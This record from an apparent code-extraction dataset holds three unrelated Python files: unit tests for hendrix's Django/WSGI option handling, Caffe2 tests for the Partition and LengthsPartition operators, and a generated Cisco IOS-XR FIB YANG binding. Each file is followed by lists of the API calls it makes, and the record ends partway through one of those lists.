import os import sys from . import HendrixTestCase, TEST_SETTINGS from hendrix.contrib import SettingsError from hendrix.options import options as hx_options from hendrix import ux from mock import patch class TestMain(HendrixTestCase): def setUp(self): super(TestMain, self).setUp() self.DEFAULTS = hx_options() os.environ['DJANGO_SETTINGS_MODULE'] = '' self.devnull = open(os.devnull, 'w') self.args_list = ['hx', 'start'] self.patcher = patch('hendrix.ux.findSettingsModule') self.patcher.start() def tearDown(self): super(TestMain, self).tearDown() self.devnull.close() self.patcher.stop() def test_settings_from_system_variable(self): django_settings = 'django.inanity' with patch('hendrix.ux.findSettingsModule') as findSettingsMod: findSettingsMod.return_value = django_settings options = self.DEFAULTS self.assertEqual(options['settings'], '') options = ux.djangoVsWsgi(options) self.assertEqual(options['settings'], django_settings) def test_settings_wsgi_absense(self): with patch('hendrix.ux.findSettingsModule') as findSettingsMod: findSettingsMod.return_value = "" self.assertRaises(SettingsError, ux.djangoVsWsgi, self.DEFAULTS) def test_user_settings_overrides_system_variable(self): django_settings = 'django.inanity' with patch('hendrix.ux.findSettingsModule') as findSettingsMod: findSettingsMod.return_value = django_settings options = self.DEFAULTS user_settings = 'myproject.settings' options['settings'] = user_settings self.assertEqual(options['settings'], user_settings) options = ux.djangoVsWsgi(options) self.assertEqual(options['settings'], user_settings) def test_wsgi_correct_wsgi_path_works(self): wsgi_dot_path = 'hendrix.test.wsgi' options = self.DEFAULTS options.update({'wsgi': wsgi_dot_path}) options = ux.djangoVsWsgi(options) self.assertEqual(options['wsgi'], wsgi_dot_path) def test_wsgi_wrong_path_raises(self): wsgi_dot_path = '_this.leads.nowhere.man' options = self.DEFAULTS options.update({'wsgi': wsgi_dot_path}) self.assertRaises(ImportError, ux.djangoVsWsgi, options) def test_cwd_exposure(self): cwd = os.getcwd() _path = sys.path sys.path = [p for p in _path if p != cwd] self.assertTrue(cwd not in sys.path) ux.exposeProject(self.DEFAULTS) self.assertTrue(cwd in sys.path) def test_pythonpath(self): options = self.DEFAULTS test_path = os.path.join( os.path.dirname(os.getcwd()), 'hendrix/test/testproject' ) options['pythonpath'] = test_path ux.exposeProject(options) self.assertTrue(test_path in sys.path) sys.path = [p for p in sys.path if p != test_path] def test_shitty_pythonpath(self): options = self.DEFAULTS test_path = '/if/u/have/this/path/you/suck' options['pythonpath'] = test_path self.assertRaises(IOError, ux.exposeProject, options) def test_dev_friendly_options(self): options = self.DEFAULTS options['dev'] = True self.assertFalse(options['reload']) self.assertFalse(options['loud']) options = ux.devFriendly(options) self.assertTrue(options['reload']) self.assertTrue(options['loud']) def test_noise_control_daemonize(self): options = self.DEFAULTS options['quiet'] = True options['daemonize'] = True stdout = sys.stdout stderr = sys.stderr redirect = ux.noiseControl(options) self.assertEqual(sys.stdout.name, stdout.name) self.assertEqual(sys.stderr.name, stderr.name) self.assertEqual(redirect, None) def test_noise_control_traceback(self): options = self.DEFAULTS options['quiet'] = True options['daemonize'] = True options['traceback'] = True stdout = sys.stdout stderr = sys.stderr redirect = ux.noiseControl(options) self.assertEqual(sys.stdout.name, stdout.name) self.assertEqual(sys.stderr.name, stderr.name) self.assertEqual(redirect, None) def test_main_with_daemonize(self): sys.argv = self.args_list + ['-d', '--settings', TEST_SETTINGS] class Process(object): def poll(self): return 0 with patch('time.sleep'): with patch('subprocess.Popen') as popen: popen.return_value = Process() ux.main() self.assertTrue(popen.called) self.assertTrue('--settings' in popen.call_args[0][0]) sys.argv = [] def test_options_structure(self): """ A test to ensure that HendrixDeploy.options also has the complete set of options available """ deploy = self.wsgiDeploy() expected_keys = self.DEFAULTS.keys() actual_keys = deploy.options.keys() self.assertListEqual(expected_keys, actual_keys)
[ "hendrix.options.options", "mock.patch", "hendrix.ux.noiseControl", "hendrix.ux.djangoVsWsgi", "os.getcwd", "hendrix.ux.main", "hendrix.ux.devFriendly", "hendrix.ux.exposeProject" ]
[((323, 335), 'hendrix.options.options', 'hx_options', ([], {}), '()\n', (333, 335), True, 'from hendrix.options import options as hx_options\n'), ((495, 533), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (500, 533), False, 'from mock import patch\n'), ((2090, 2114), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (2105, 2114), False, 'from hendrix import ux\n'), ((2460, 2471), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2469, 2471), False, 'import os\n'), ((2600, 2631), 'hendrix.ux.exposeProject', 'ux.exposeProject', (['self.DEFAULTS'], {}), '(self.DEFAULTS)\n', (2616, 2631), False, 'from hendrix import ux\n'), ((2912, 2937), 'hendrix.ux.exposeProject', 'ux.exposeProject', (['options'], {}), '(options)\n', (2928, 2937), False, 'from hendrix import ux\n'), ((3479, 3502), 'hendrix.ux.devFriendly', 'ux.devFriendly', (['options'], {}), '(options)\n', (3493, 3502), False, 'from hendrix import ux\n'), ((3807, 3831), 'hendrix.ux.noiseControl', 'ux.noiseControl', (['options'], {}), '(options)\n', (3822, 3831), False, 'from hendrix import ux\n'), ((4240, 4264), 'hendrix.ux.noiseControl', 'ux.noiseControl', (['options'], {}), '(options)\n', (4255, 4264), False, 'from hendrix import ux\n'), ((793, 831), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (798, 831), False, 'from mock import patch\n'), ((1023, 1047), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (1038, 1047), False, 'from hendrix import ux\n'), ((1171, 1209), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (1176, 1209), False, 'from mock import patch\n'), ((1470, 1508), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (1475, 1508), False, 'from mock import patch\n'), ((1808, 1832), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (1823, 1832), False, 'from hendrix import ux\n'), ((4628, 4647), 'mock.patch', 'patch', (['"""time.sleep"""'], {}), "('time.sleep')\n", (4633, 4647), False, 'from mock import patch\n'), ((2799, 2810), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2808, 2810), False, 'import os\n'), ((4666, 4691), 'mock.patch', 'patch', (['"""subprocess.Popen"""'], {}), "('subprocess.Popen')\n", (4671, 4691), False, 'from mock import patch\n'), ((4765, 4774), 'hendrix.ux.main', 'ux.main', ([], {}), '()\n', (4772, 4774), False, 'from hendrix import ux\n')]
# Copyright (c) 2016-present, Facebook, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################## from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import numpy as np from caffe2.python import core, workspace from caffe2.python.test_util import TestCase, rand_array class TestPartitionOps(TestCase): def test_configs(self): # (main dims, partitions, main type, [list of (extra dims, type)]) configs = [ ((10, ), 3), ((4, ), 10), ((10, 10), 4), ((100, ), 2), ((5, ), 1), ((1, ), 1), ((2, 10), 2), ] suffixes = [ [], [((2, 2), np.float32)], [((3, ), np.int64), ((2, ), np.float32)], ] return [ (main_dims, parts, main_type, extra, pack) for main_dims, parts in configs for main_type in [np.int32, np.int64] for extra in suffixes for pack in [False, True] ] def testPartition(self): for main_dims, parts, main_type, extra_ins, pack in self.test_configs(): ins = ['in' + str(i) for i in range(1 + len(extra_ins))] outs = [ 'in{}_p{}'.format(j, i) for i in range(parts) for j in range(1 + len(extra_ins)) ] op = core.CreateOperator( 'Partition', ins, outs, pack_first_input=(1 if pack else 0)) x = [] for i, (dims, t) in enumerate([((), main_type)] + extra_ins): if t in [np.float32, np.float64]: d = rand_array(*(main_dims + dims)) else: d = np.random.randint(-100, 100, (main_dims + dims)) d = d.astype(t) workspace.FeedBlob(ins[i], d) x.append(d) def sharding(x): # numpy has proper modulo op that yields non-negative results shards = (x[0] % parts).reshape([-1]) out = [] for i in range(parts): for ind, v in enumerate(x): suffix_shape = v.shape[len(x[0].shape):] accum = [] data = v.reshape((-1, ) + suffix_shape) if pack and ind == 0: data = data // parts for j, s in enumerate(shards): if s == i: accum.append(data[j]) def join(a): if not a: return np.empty(shape=(0, ) + suffix_shape) return np.stack(a) out.append(join(accum)) return out workspace.RunOperatorOnce(op) ref = sharding(x) print(x) print(ref) for name, expected in zip(outs, ref): np.testing.assert_array_equal( expected, workspace.FetchBlob(name) ) # test inverse operation (GatherByKey) if len(main_dims) == 1: # currently only 1D key tensor supported for i in range(len(extra_ins)): expected_out = ins[i + 1] gather_ins = [ins[0]] + [ outs[len(ins) * p + i + 1] for p in range(parts)] actual_out = expected_out + '_actual' op = core.CreateOperator( 'GatherByKey', gather_ins, actual_out) workspace.RunOperatorOnce(op) expected = workspace.FetchBlob(expected_out) actual = workspace.FetchBlob(actual_out) np.testing.assert_array_equal(expected, actual) def testLengthsPartition(self): for main_dims, parts, main_type, extra_ins, pack in self.test_configs(): # For LengthsSharding only 1-D tensors supported as a first input if len(main_dims) > 1: continue ins = ['in' + str(i) for i in range(2 + len(extra_ins))] outs = [ 'in{}_p{}'.format(j, i) for i in range(parts) for j in range(2 + len(extra_ins)) ] op = core.CreateOperator( 'LengthsPartition', ins, outs, pack_first_input=(1 if pack else 0) ) x = [] for i, (dims, t) in enumerate([((), main_type)] + extra_ins): if t in [np.float32, np.float64]: d = rand_array(*(main_dims + dims)) else: d = np.random.randint(-100, 100, (main_dims + dims)) d = d.astype(t) workspace.FeedBlob(ins[i + 1], d) x.append(d) # Randomly generate length tensor as well elements = np.random.randint(2, 10) lengths = [] total_length = 0 for _ in range(elements - 1): lengths.append(np.random.randint(main_dims[0] - total_length)) total_length += lengths[-1] lengths.append(main_dims[0] - total_length) workspace.FeedBlob(ins[0], np.array(lengths, dtype=np.int32)) def sharding(x): # numpy has proper modulo op that yields non-negative results shards = (x[0] % parts).reshape([-1]) out = [] for i in range(parts): idx = 0 sharded_lengths = np.zeros(elements) for ind, length in enumerate(lengths): for _ in range(length): if shards[idx] == i: sharded_lengths[ind] += 1 idx += 1 out.append(sharded_lengths) for ind, v in enumerate(x): suffix_shape = v.shape[len(x[0].shape):] accum = [] data = v.reshape((-1, ) + suffix_shape) if pack and ind == 0: data = data // parts for j, s in enumerate(shards): if s == i: accum.append(data[j]) def join(a): if not a: return np.empty(shape=(0, ) + suffix_shape) return np.stack(a) out.append(join(accum)) return out workspace.RunOperatorOnce(op) ref = sharding(x) for name, expected in zip(outs, ref): np.testing.assert_array_equal( expected, workspace.FetchBlob(name) ) if __name__ == "__main__": import unittest unittest.main()
[ "caffe2.python.test_util.rand_array", "caffe2.python.workspace.RunOperatorOnce", "caffe2.python.workspace.FetchBlob", "numpy.array", "numpy.random.randint", "numpy.zeros", "numpy.stack", "numpy.empty", "caffe2.python.core.CreateOperator", "unittest.main", "numpy.testing.assert_array_equal", "caffe2.python.workspace.FeedBlob" ]
[((7638, 7653), 'unittest.main', 'unittest.main', ([], {}), '()\n', (7651, 7653), False, 'import unittest\n'), ((2004, 2082), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""Partition"""', 'ins', 'outs'], {'pack_first_input': '(1 if pack else 0)'}), "('Partition', ins, outs, pack_first_input=1 if pack else 0)\n", (2023, 2082), False, 'from caffe2.python import core, workspace\n'), ((3473, 3502), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (3498, 3502), False, 'from caffe2.python import core, workspace\n'), ((5009, 5098), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""LengthsPartition"""', 'ins', 'outs'], {'pack_first_input': '(1 if pack else 0)'}), "('LengthsPartition', ins, outs, pack_first_input=1 if\n pack else 0)\n", (5028, 5098), False, 'from caffe2.python import core, workspace\n'), ((5625, 5649), 'numpy.random.randint', 'np.random.randint', (['(2)', '(10)'], {}), '(2, 10)\n', (5642, 5649), True, 'import numpy as np\n'), ((7355, 7384), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (7380, 7384), False, 'from caffe2.python import core, workspace\n'), ((2444, 2473), 'caffe2.python.workspace.FeedBlob', 'workspace.FeedBlob', (['ins[i]', 'd'], {}), '(ins[i], d)\n', (2462, 2473), False, 'from caffe2.python import core, workspace\n'), ((5485, 5518), 'caffe2.python.workspace.FeedBlob', 'workspace.FeedBlob', (['ins[i + 1]', 'd'], {}), '(ins[i + 1], d)\n', (5503, 5518), False, 'from caffe2.python import core, workspace\n'), ((5964, 5997), 'numpy.array', 'np.array', (['lengths'], {'dtype': 'np.int32'}), '(lengths, dtype=np.int32)\n', (5972, 5997), True, 'import numpy as np\n'), ((2269, 2300), 'caffe2.python.test_util.rand_array', 'rand_array', (['*(main_dims + dims)'], {}), '(*(main_dims + dims))\n', (2279, 2300), False, 'from caffe2.python.test_util import TestCase, rand_array\n'), ((2347, 2393), 'numpy.random.randint', 'np.random.randint', (['(-100)', '(100)', '(main_dims + dims)'], {}), '(-100, 100, main_dims + dims)\n', (2364, 2393), True, 'import numpy as np\n'), ((3704, 3729), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['name'], {}), '(name)\n', (3723, 3729), False, 'from caffe2.python import core, workspace\n'), ((4190, 4248), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""GatherByKey"""', 'gather_ins', 'actual_out'], {}), "('GatherByKey', gather_ins, actual_out)\n", (4209, 4248), False, 'from caffe2.python import core, workspace\n'), ((4294, 4323), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (4319, 4323), False, 'from caffe2.python import core, workspace\n'), ((4355, 4388), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['expected_out'], {}), '(expected_out)\n', (4374, 4388), False, 'from caffe2.python import core, workspace\n'), ((4418, 4449), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['actual_out'], {}), '(actual_out)\n', (4437, 4449), False, 'from caffe2.python import core, workspace\n'), ((4470, 4517), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['expected', 'actual'], {}), '(expected, actual)\n', (4499, 4517), True, 'import numpy as np\n'), ((5310, 5341), 'caffe2.python.test_util.rand_array', 'rand_array', (['*(main_dims + dims)'], {}), '(*(main_dims + dims))\n', (5320, 5341), False, 'from caffe2.python.test_util import TestCase, rand_array\n'), ((5388, 5434), 'numpy.random.randint', 'np.random.randint', (['(-100)', '(100)', '(main_dims + dims)'], {}), '(-100, 100, main_dims + dims)\n', (5405, 5434), True, 'import numpy as np\n'), ((5777, 5823), 'numpy.random.randint', 'np.random.randint', (['(main_dims[0] - total_length)'], {}), '(main_dims[0] - total_length)\n', (5794, 5823), True, 'import numpy as np\n'), ((6291, 6309), 'numpy.zeros', 'np.zeros', (['elements'], {}), '(elements)\n', (6299, 6309), True, 'import numpy as np\n'), ((7542, 7567), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['name'], {}), '(name)\n', (7561, 7567), False, 'from caffe2.python import core, workspace\n'), ((3372, 3383), 'numpy.stack', 'np.stack', (['a'], {}), '(a)\n', (3380, 3383), True, 'import numpy as np\n'), ((7254, 7265), 'numpy.stack', 'np.stack', (['a'], {}), '(a)\n', (7262, 7265), True, 'import numpy as np\n'), ((3300, 3335), 'numpy.empty', 'np.empty', ([], {'shape': '((0,) + suffix_shape)'}), '(shape=(0,) + suffix_shape)\n', (3308, 3335), True, 'import numpy as np\n'), ((7182, 7217), 'numpy.empty', 'np.empty', ([], {'shape': '((0,) + suffix_shape)'}), '(shape=(0,) + suffix_shape)\n', (7190, 7217), True, 'import numpy as np\n')]
""" Cisco_IOS_XR_fib_common_cfg This module contains a collection of YANG definitions for Cisco IOS\-XR fib\-common package configuration. This module contains definitions for the following management objects\: fib\: CEF configuration Copyright (c) 2013\-2018 by Cisco Systems, Inc. All rights reserved. """ from collections import OrderedDict from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64 from ydk.filters import YFilter from ydk.errors import YError, YModelError from ydk.errors.error_handler import handle_type_error as _handle_type_error class FibPbtsFallback(Enum): """ FibPbtsFallback (Enum Class) Fib pbts fallback .. data:: list = 1 Fallback to class number list .. data:: any = 2 Fallback to any class .. data:: drop = 3 Fallback to drop """ list = Enum.YLeaf(1, "list") any = Enum.YLeaf(2, "any") drop = Enum.YLeaf(3, "drop") class FibPbtsForwardClass(Enum): """ FibPbtsForwardClass (Enum Class) Fib pbts forward class .. data:: any = 8 Any class """ any = Enum.YLeaf(8, "any") class Fib(Entity): """ CEF configuration .. attribute:: pbts_forward_class_fallbacks PBTS class configuration **type**\: :py:class:`PbtsForwardClassFallbacks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.PbtsForwardClassFallbacks>` .. attribute:: platform FIB platform parameters **type**\: :py:class:`Platform <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.Platform>` .. attribute:: auto_hash_recover Set option for automatcially recovering consistent\-hashing state on interface up **type**\: bool .. attribute:: prefer_aib_routes Set options for adjacency routes overriding RIB routes **type**\: bool .. attribute:: encap_sharing_disable Set true to disable encapsulation sharing **type**\: bool .. attribute:: frr_follow_bgp_pic Set option for fast\-reroute to follow BGP PIC update, not to wait for timeout **type**\: bool """ _prefix = 'fib-common-cfg' _revision = '2017-05-01' def __init__(self): super(Fib, self).__init__() self._top_entity = None self.yang_name = "fib" self.yang_parent_name = "Cisco-IOS-XR-fib-common-cfg" self.is_top_level_class = True self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("pbts-forward-class-fallbacks", ("pbts_forward_class_fallbacks", Fib.PbtsForwardClassFallbacks)), ("platform", ("platform", Fib.Platform))]) self._leafs = OrderedDict([ ('auto_hash_recover', (YLeaf(YType.boolean, 'auto-hash-recover'), ['bool'])), ('prefer_aib_routes', (YLeaf(YType.boolean, 'prefer-aib-routes'), ['bool'])), ('encap_sharing_disable', (YLeaf(YType.boolean, 'encap-sharing-disable'), ['bool'])), ('frr_follow_bgp_pic', (YLeaf(YType.boolean, 'frr-follow-bgp-pic'), ['bool'])), ]) self.auto_hash_recover = None self.prefer_aib_routes = None self.encap_sharing_disable = None self.frr_follow_bgp_pic = None self.pbts_forward_class_fallbacks = Fib.PbtsForwardClassFallbacks() self.pbts_forward_class_fallbacks.parent = self self._children_name_map["pbts_forward_class_fallbacks"] = "pbts-forward-class-fallbacks" self.platform = Fib.Platform() self.platform.parent = self self._children_name_map["platform"] = "platform" self._segment_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(Fib, ['auto_hash_recover', 'prefer_aib_routes', 'encap_sharing_disable', 'frr_follow_bgp_pic'], name, value) class PbtsForwardClassFallbacks(Entity): """ PBTS class configuration .. attribute:: pbts_forward_class_fallback Set PBTS class for fallback **type**\: list of :py:class:`PbtsForwardClassFallback <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback>` """ _prefix = 'fib-common-cfg' _revision = '2017-05-01' def __init__(self): super(Fib.PbtsForwardClassFallbacks, self).__init__() self.yang_name = "pbts-forward-class-fallbacks" self.yang_parent_name = "fib" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("pbts-forward-class-fallback", ("pbts_forward_class_fallback", Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback))]) self._leafs = OrderedDict() self.pbts_forward_class_fallback = YList(self) self._segment_path = lambda: "pbts-forward-class-fallbacks" self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(Fib.PbtsForwardClassFallbacks, [], name, value) class PbtsForwardClassFallback(Entity): """ Set PBTS class for fallback .. attribute:: forward_class_number (key) PBTS forward class number **type**\: union of the below types: **type**\: :py:class:`FibPbtsForwardClass <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.FibPbtsForwardClass>` **type**\: int **range:** 0..8 .. attribute:: fallback_type Set PBTS fallback type **type**\: :py:class:`FibPbtsFallback <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.FibPbtsFallback>` **mandatory**\: True .. attribute:: fallback_class_number_array Set PBTS fallback class number array **type**\: list of int **range:** 0..7 """ _prefix = 'fib-common-cfg' _revision = '2017-05-01' def __init__(self): super(Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback, self).__init__() self.yang_name = "pbts-forward-class-fallback" self.yang_parent_name = "pbts-forward-class-fallbacks" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = ['forward_class_number'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('forward_class_number', (YLeaf(YType.str, 'forward-class-number'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg', 'FibPbtsForwardClass', ''),'int'])), ('fallback_type', (YLeaf(YType.enumeration, 'fallback-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg', 'FibPbtsFallback', '')])), ('fallback_class_number_array', (YLeafList(YType.uint32, 'fallback-class-number-array'), ['int'])), ]) self.forward_class_number = None self.fallback_type = None self.fallback_class_number_array = [] self._segment_path = lambda: "pbts-forward-class-fallback" + "[forward-class-number='" + str(self.forward_class_number) + "']" self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/pbts-forward-class-fallbacks/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback, ['forward_class_number', 'fallback_type', 'fallback_class_number_array'], name, value) class Platform(Entity): """ FIB platform parameters .. attribute:: label_switched_multicast Options for label\-switched\-multicast parameters **type**\: :py:class:`LabelSwitchedMulticast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.Platform.LabelSwitchedMulticast>` """ _prefix = 'fib-common-cfg' _revision = '2017-05-01' def __init__(self): super(Fib.Platform, self).__init__() self.yang_name = "platform" self.yang_parent_name = "fib" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("label-switched-multicast", ("label_switched_multicast", Fib.Platform.LabelSwitchedMulticast))]) self._leafs = OrderedDict() self.label_switched_multicast = Fib.Platform.LabelSwitchedMulticast() self.label_switched_multicast.parent = self self._children_name_map["label_switched_multicast"] = "label-switched-multicast" self._segment_path = lambda: "platform" self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(Fib.Platform, [], name, value) class LabelSwitchedMulticast(Entity): """ Options for label\-switched\-multicast parameters .. attribute:: frr_holdtime Set time to keep FRR slots programmed post FRR **type**\: int **range:** 3..180 **units**\: second """ _prefix = 'fib-common-cfg' _revision = '2017-05-01' def __init__(self): super(Fib.Platform.LabelSwitchedMulticast, self).__init__() self.yang_name = "label-switched-multicast" self.yang_parent_name = "platform" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('frr_holdtime', (YLeaf(YType.uint32, 'frr-holdtime'), ['int'])), ]) self.frr_holdtime = None self._segment_path = lambda: "label-switched-multicast" self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/platform/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(Fib.Platform.LabelSwitchedMulticast, ['frr_holdtime'], name, value) def clone_ptr(self): self._top_entity = Fib() return self._top_entity
[ "collections.OrderedDict", "ydk.types.YLeafList", "ydk.types.YLeaf", "ydk.types.YList", "ydk.types.Enum.YLeaf" ]
[((906, 927), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(1)', '"""list"""'], {}), "(1, 'list')\n", (916, 927), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((939, 959), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(2)', '"""any"""'], {}), "(2, 'any')\n", (949, 959), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((972, 993), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(3)', '"""drop"""'], {}), "(3, 'drop')\n", (982, 993), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((1161, 1181), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(8)', '"""any"""'], {}), "(8, 'any')\n", (1171, 1181), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((2597, 2761), 'collections.OrderedDict', 'OrderedDict', (["[('pbts-forward-class-fallbacks', ('pbts_forward_class_fallbacks', Fib.\n PbtsForwardClassFallbacks)), ('platform', ('platform', Fib.Platform))]"], {}), "([('pbts-forward-class-fallbacks', (\n 'pbts_forward_class_fallbacks', Fib.PbtsForwardClassFallbacks)), (\n 'platform', ('platform', Fib.Platform))])\n", (2608, 2761), False, 'from collections import OrderedDict\n'), ((4804, 4943), 'collections.OrderedDict', 'OrderedDict', (["[('pbts-forward-class-fallback', ('pbts_forward_class_fallback', Fib.\n PbtsForwardClassFallbacks.PbtsForwardClassFallback))]"], {}), "([('pbts-forward-class-fallback', ('pbts_forward_class_fallback',\n Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback))])\n", (4815, 4943), False, 'from collections import OrderedDict\n'), ((4966, 4979), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (4977, 4979), False, 'from collections import OrderedDict\n'), ((5028, 5039), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (5033, 5039), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((8949, 9064), 'collections.OrderedDict', 'OrderedDict', (["[('label-switched-multicast', ('label_switched_multicast', Fib.Platform.\n LabelSwitchedMulticast))]"], {}), "([('label-switched-multicast', ('label_switched_multicast', Fib.\n Platform.LabelSwitchedMulticast))])\n", (8960, 9064), False, 'from collections import OrderedDict\n'), ((9086, 9099), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (9097, 9099), False, 'from collections import OrderedDict\n'), ((6945, 6960), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (6956, 6960), False, 'from collections import OrderedDict\n'), ((10516, 10531), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (10527, 10531), False, 'from collections import OrderedDict\n'), ((2823, 2864), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""auto-hash-recover"""'], {}), "(YType.boolean, 'auto-hash-recover')\n", (2828, 2864), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((2913, 2954), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""prefer-aib-routes"""'], {}), "(YType.boolean, 'prefer-aib-routes')\n", (2918, 2954), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((3007, 3052), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""encap-sharing-disable"""'], {}), "(YType.boolean, 'encap-sharing-disable')\n", (3012, 3052), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((3102, 3144), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""frr-follow-bgp-pic"""'], {}), "(YType.boolean, 'frr-follow-bgp-pic')\n", (3107, 3144), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7051, 7091), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""forward-class-number"""'], {}), "(YType.str, 'forward-class-number')\n", (7056, 7091), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7226, 7267), 'ydk.types.YLeaf', 'YLeaf', (['YType.enumeration', '"""fallback-type"""'], {}), "(YType.enumeration, 'fallback-type')\n", (7231, 7267), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7406, 7460), 'ydk.types.YLeafList', 'YLeafList', (['YType.uint32', '"""fallback-class-number-array"""'], {}), "(YType.uint32, 'fallback-class-number-array')\n", (7415, 7460), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((10614, 10649), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""frr-holdtime"""'], {}), 